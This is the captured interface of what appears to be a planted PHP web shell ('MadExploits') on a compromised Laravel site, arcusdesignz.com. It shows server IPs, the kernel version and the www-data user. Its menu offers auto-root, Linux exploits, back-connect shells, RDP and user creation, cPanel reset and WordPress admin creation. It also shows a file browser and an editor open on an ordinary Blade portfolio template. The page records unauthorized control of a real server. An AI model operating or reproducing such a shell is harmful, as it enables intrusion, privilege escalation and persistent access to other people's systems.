Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 172.70.111.33
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
arcusdesignz.com /
source /
resources /
views /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
client_panel
[ DIR ]
drwxr-xr-x
emails
[ DIR ]
drwxr-xr-x
errors
[ DIR ]
drwxr-xr-x
exports
[ DIR ]
drwxr-xr-x
layouts
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
about_us.blade.php
18.64
KB
-rw-r--r--
blogs.blade.php
3.17
KB
-rw-r--r--
contact_us.blade.php
13.09
KB
-rw-r--r--
index.blade.php
58.91
KB
-rw-r--r--
index_old.blade.php
9.71
KB
-rw-r--r--
portfolio.blade.php
5.45
KB
-rw-r--r--
post.blade.php
2.35
KB
-rw-r--r--
privacy_security.blade.php
829
B
-rw-r--r--
project_detail.blade.php
4.59
KB
-rw-r--r--
projects.blade.php
1.66
KB
-rw-r--r--
review.blade.php
9.18
KB
-rw-r--r--
search.blade.php
13.68
KB
-rw-r--r--
service_detail.blade.php
30.77
KB
-rw-r--r--
services.blade.php
21.78
KB
-rw-r--r--
sitemap.blade.php
5.96
KB
-rw-r--r--
sitemapxml.blade.php
2.34
KB
-rw-r--r--
templates.blade.php
42.18
KB
-rw-r--r--
terms.blade.php
760
B
-rw-r--r--
thank_you.blade.php
1.66
KB
-rw-r--r--
welcome.blade.php
72.5
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : portfolio.blade.php
@extends('layouts.app') @section('contents') <!-- ========== Portfolio ========== --> <div class="p-relative"> <div class="p-relative dsn-style-cards dsn-align-center "> <div class="root-posts"> <div class="dsn-posts dsn-post-type-cards box-image-normal "> <div class="has-parallax-image dsn-swiper p-relative" data-dsn-option='{"slidesPerView":1.5,"spaceBetween":60 , "mousewheel":true}'> <div class="swiper-container "> <div class="swiper-wrapper v-dark-head"> @foreach($projects as $p) <article class="dsn-item-post grid-item over-hidden p-relative box-hover-image swiper-slide"> <div class="box-content d-flex "> <a class="effect-ajax box-image-link bg-shadow" href="{{url($p->slug)}}" data-dsn-ajax="work" title="{{$p->title}}"> <div class="box-image-bg before-z-index dsn-swiper-parallax-transform" data-overlay="4"> <img class="cover-bg-img" src="{{asset('assets/projects/'.$p->image)}}" alt="{{$p->alt}}"/> </div> </a> <div class="post-content dsn-bg p-relative z-index-1 d-flex flex-column" data-swiper-parallax="100%" data-swiper-parallax-opacity="0"> <div class="post-title-info"> <div class="post-meta max-w750"> <div class="p-relative d-inline-block dsn-category dsn-bg metas mb-10 entry-meta"> <span data-separator="&">{{$p->type}}</span> </div> </div> <h2 class="post-title title"> <a href="{{url($p->slug)}}" class="effect-ajax" data-dsn-ajax="work"> {{$p->title}} </a> </h2> <a href="{{url($p->slug)}}" class="effect-ajax dsn-post-link move-circle border-color-heading" data-dsn="parallax" data-dsn-ajax="work"> <svg width="24" height="24" xmlns="../../../www.w3.org/2000/svg.html"> <path class="arrow-after" d="M21.883 12l-7.527 6.235.644.765 9-7.521-9-7.479-.645.764 7.529 6.236h-21.884v1h21.883z"/> </svg> </a> </div> </div> </div> </article> @endforeach </div> </div> <div class="dsn-swiper-paginate p-absolute dsn-nav-arrow d-flex p-relative w-100 h-100 mt-50 dsn-container justify-content-center dsn-icon-heading-color"> <div class="border-color-default swiper-prev background-section image-zoom move-circle dsn-nav-left" data-dsn="parallax" > <div class="dsn-icon"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 25 25"> <g> <polygon points="24 12.001 2.914 12.001 8.208 6.706 7.501 5.999 1 12.501 7.5 19.001 8.207 18.294 2.914 13.001 24 13.001 24 12.001"/> </g> </svg> </div> </div> <div class="border-color-default swiper-next background-section image-zoom move-circle dsn-nav-right" data-dsn="parallax" > <div class="dsn-icon"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 25 25"> <g> <polygon points="24 12.001 2.914 12.001 8.208 6.706 7.501 5.999 1 12.501 7.5 19.001 8.207 18.294 2.914 13.001 24 13.001 24 12.001"/> </g> </svg> </div> </div> </div> </div> </div> </div> </div> </div> <!-- ========== End Portfolio ========== --> @endsection
Close